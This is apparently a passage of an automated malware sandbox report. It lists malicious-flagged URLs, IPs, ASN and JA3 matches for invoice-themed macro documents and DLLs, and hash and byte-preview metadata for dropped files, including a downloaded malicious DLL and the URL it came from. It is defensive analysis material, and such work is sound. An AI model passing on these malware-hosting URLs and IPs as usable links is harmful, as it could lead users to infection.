	https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3D	Get hash	malicious	Browse	104.18.10.39
	https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D	Get hash	malicious	Browse	104.18.10.39

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GD-EMEA-DC-SXB1DE	xad05r9ba.dll	Get hash	malicious	Browse	80.86.91.27
	mcluc5u.dll	Get hash	malicious	Browse	80.86.91.27
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	80.86.91.27
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	80.86.91.27
	HkNkyKl3uT.dll	Get hash	malicious	Browse	80.86.91.27
	ceepq536n.zip.dll	Get hash	malicious	Browse	80.86.91.27
	sample20210111-01.xlsm	Get hash	malicious	Browse	80.86.91.27
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	80.86.91.27
	hiytvys.dll	Get hash	malicious	Browse	80.86.91.27
	l7rgi3xyd.dll	Get hash	malicious	Browse	80.86.91.27
	ymuyks.dll	Get hash	malicious	Browse	80.86.91.27
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	80.86.91.27
	hy9x6wzip.dll	Get hash	malicious	Browse	80.86.91.27
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	80.86.91.27
	jufk0vrar.dll	Get hash	malicious	Browse	80.86.91.27
	s3CRQNulKZ.exe	Get hash	malicious	Browse	217.172.179.54
	DFR2154747.vbe	Get hash	malicious	Browse	85.25.93.233
	r8a97.exe	Get hash	malicious	Browse	62.75.168.106
	NKsplucdAu.exe	Get hash	malicious	Browse	217.172.179.54
	lZVNh1BPxm.exe	Get hash	malicious	Browse	217.172.179.54
OVHFR	QT55.vbs	Get hash	malicious	Browse	51.89.204.178
	VN55.vbs	Get hash	malicious	Browse	51.89.204.178
	INVOICE-0966542R.exe	Get hash	malicious	Browse	178.33.222.241
	VP57.vbs	Get hash	malicious	Browse	51.89.204.178
	xad05r9ba.dll	Get hash	malicious	Browse	46.105.131.65
	mcluc5u.dll	Get hash	malicious	Browse	46.105.131.65
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	46.105.131.65
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	46.105.131.65
	HkNkyKl3uT.dll	Get hash	malicious	Browse	46.105.131.65
	Doc_74657456348374.xlsx	Get hash	malicious	Browse	149.202.23.211
	ceepq536n.zip.dll	Get hash	malicious	Browse	46.105.131.65
	sample20210111-01.xlsm	Get hash	malicious	Browse	46.105.131.65
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	46.105.131.65
	sfk_setup.exe	Get hash	malicious	Browse	54.39.133.136
	hiytvys.dll	Get hash	malicious	Browse	46.105.131.65
	l7rgi3xyd.dll	Get hash	malicious	Browse	46.105.131.65
	ymuyks.dll	Get hash	malicious	Browse	46.105.131.65
	Client.vbs	Get hash	malicious	Browse	92.222.182.237
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	46.105.131.65
	hy9x6wzip.dll	Get hash	malicious	Browse	46.105.131.65
SENTIANL	xad05r9ba.dll	Get hash	malicious	Browse	5.100.228.233
	mcluc5u.dll	Get hash	malicious	Browse	5.100.228.233
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	5.100.228.233
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	5.100.228.233
	HkNkyKl3uT.dll	Get hash	malicious	Browse	5.100.228.233
	ceepq536n.zip.dll	Get hash	malicious	Browse	5.100.228.233
	sample20210111-01.xlsm	Get hash	malicious	Browse	5.100.228.233
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	5.100.228.233
	hiytvys.dll	Get hash	malicious	Browse	5.100.228.233
	l7rgi3xyd.dll	Get hash	malicious	Browse	5.100.228.233
	ymuyks.dll	Get hash	malicious	Browse	5.100.228.233
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	5.100.228.233
	hy9x6wzip.dll	Get hash	malicious	Browse	5.100.228.233
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	5.100.228.233
	jufk0vrar.dll	Get hash	malicious	Browse	5.100.228.233
	anthon.exe	Get hash	malicious	Browse	145.131.21.142
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	91.216.141.46
	p8LV1eVFyO.exe	Get hash	malicious	Browse	91.216.141.46
	IQtvZjIdhN.exe	Get hash	malicious	Browse	91.216.141.46
	148wWoi8vI.exe	Get hash	malicious	Browse	91.216.141.46

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	ACH PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	104.27.153.52
	FedEx 772584418730.doc	Get hash	malicious	Browse	104.27.153.52
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	104.27.153.52
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18733.rtf	Get hash	malicious	Browse	104.27.153.52
	PURCHASE ORDER-34002174.doc	Get hash	malicious	Browse	104.27.153.52
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtf	Get hash	malicious	Browse	104.27.153.52
	n#U00b0 761.doc	Get hash	malicious	Browse	104.27.153.52
	swift 0182021.xls	Get hash	malicious	Browse	104.27.153.52
	Curriculo Laura.xlsm	Get hash	malicious	Browse	104.27.153.52
	prints-eduardo-bolsonaro.docm	Get hash	malicious	Browse	104.27.153.52
	Curriculo Laura.xlsm	Get hash	malicious	Browse	104.27.153.52
	prints carlos bolsonaro.docm	Get hash	malicious	Browse	104.27.153.52
	prints carlos bolsonaro.docm	Get hash	malicious	Browse	104.27.153.52
	New PO.doc	Get hash	malicious	Browse	104.27.153.52
	Recibo de la transaccion.xls	Get hash	malicious	Browse	104.27.153.52
	Xeron_Scan2021002111002.doc	Get hash	malicious	Browse	104.27.153.52
	INFO.xls	Get hash	malicious	Browse	104.27.153.52
	SWIFT_075.dotm	Get hash	malicious	Browse	104.27.153.52
	Order-Detail-17534.doc	Get hash	malicious	Browse	104.27.153.52
	Shipping Document PL and BL003534.ppt	Get hash	malicious	Browse	104.27.153.52
eb88d0b3e1961a0562f006e5ce2a0b87	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	77.220.64.37
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Heur.15645.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_1857_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Statement_9505_of_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 73221_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	Invoice.29002611.doc	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 64338_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.367371959019618
Encrypted:	false
SSDEEP:	24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
MD5:	E4A68AC854AC5242460AFD72481B2A44
SHA1:	DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
SHA-256:	CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
SHA-512:	5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..v........:......(d.....0....H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0....H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.\|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90....H.............`g(.o.Hc.1..g..}<.J...+.._sw2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq...O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.09723161333692
Encrypted:	false
SSDEEP:	6:kKRUpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:JwLutWOxSW0zeYrsMlU/
MD5:	AEC41C62F344451AF6BE3D04A4AD3094
SHA1:	A890D05906731612A72AB63F90B0B9F0D16BA047
SHA-256:	3F0E01BBF2031B41F0601EFD45730346E529CB6CEE6F92959EEC94F277EC34A0
SHA-512:	2B0FB7C3B0EE287E23D37052D5C3C9D53441DC229D6014197F287E6CA64139D18FB7290B4E26571F7E4A077AED7D07989A93EDB4EEED6BE55F4CD38057C789EB
Malicious:	false
Reputation:	low
Preview:	p...... ....j....T.E....(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1231869637929046
Encrypted:	false
SSDEEP:	6:kK+rwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:2QkPlE99SNxAhUegeT2
MD5:	26C0ED9FA0004EB0BFEB3AEE6533A372
SHA1:	D849F27AFE0DF2D0E72731A32EA80BC4B47EAF86
SHA-256:	8F3FD30E7B20189BCAD9C1BC7D1DF5B9840DD1EF4F65010631A0D31A73208B9D
SHA-512:	ABCFE4D2D6C0E056A3746E444C11F2F8A6008C5CDC4F82A0BF3159B2E615FDFB88DD387826DEC83B365DE446A5202F0DA6095A45F0A504EB0ABD11CD3CCFCE62
Malicious:	false
Reputation:	low
Preview:	p...... ........f_......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	319488
Entropy (8bit):	7.125176562164236
Encrypted:	false
SSDEEP:	6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
MD5:	597B02A17B8C012E25FA0A668004163B
SHA1:	424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
SHA-256:	E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
SHA-512:	C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	https://education.scrollx.in/w80l82r.zip
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................\|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...\|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FECA1BF.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	2.270567557934206
Encrypted:	false
SSDEEP:	12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
MD5:	40550DC2F9D56285FA529159B8F2C6A5
SHA1:	DD81D41D283D2881BEC77E00D773C7E8C0744DA3
SHA-256:	DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
SHA-512:	FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l................................... EMF........).......................`...1........................\|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................

C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_0bd2ab0e\Report.wer Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	data
Category:	dropped
Size (bytes):	16734
Entropy (8bit):	3.714145190828899
Encrypted:	false
SSDEEP:	96:23s4HBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOL:2jyBKzFCEuhTlyZlz+lVaJa5GG
MD5:	09ED45F1BA180F7C4BDDCCFA2421196B
SHA1:	CB7694D9A8C328754E2429EDA921C470501C1A4A
SHA-256:	A3DBC50E1A6C991DD5DB447B5F0FD0E1190ED0D7BC2F293EB48D40482AF232DE
SHA-512:	2C6511F572FD6416DCADC04BB637D229674D1D3DED1AB474D339A2B42DD5F6A6FDDC7592C4E97EC58D7C42E8E751DB9C832B26E15E8A0263E16E0122C6F9F534
Malicious:	false
Reputation:	low
Preview:	V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.3.9.6.1.7.3.3.8.8.9.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.3.9.6.3.4.3.4.2.9.2.8.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.a.d.d.8.7.a.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.a.d.d.8.7.9.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.

C:\Users\user\AppData\Local\Temp\050F0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58293
Entropy (8bit):	7.859004361891608
Encrypted:	false
SSDEEP:	1536:hAjRzggbLmCf6646CIK4fxalO77nXblvNbsLNFqqW:hAj1rmCM2U877X5vNb+xW
MD5:	DA02AD566D93F2D945AC338963991BC5
SHA1:	4063109EE9F53A1861E52F7AFA3F1C5D6C73097A
SHA-256:	ECF16677D55711C79661EFF5BAC0BF3E15FEB1AF8253F949745F1B05B6F6F6E2
SHA-512:	C4787CEF074745F61F4A7E1A331A3E1DE4BF99546B7D61E7A0BF8C4EDC73473077D6738B642E7FF3829B7BB2D88D991331C84789E8C9D24A98B0E2037F2867DA
Malicious:	false
Reputation:	low
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008733.cvr Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
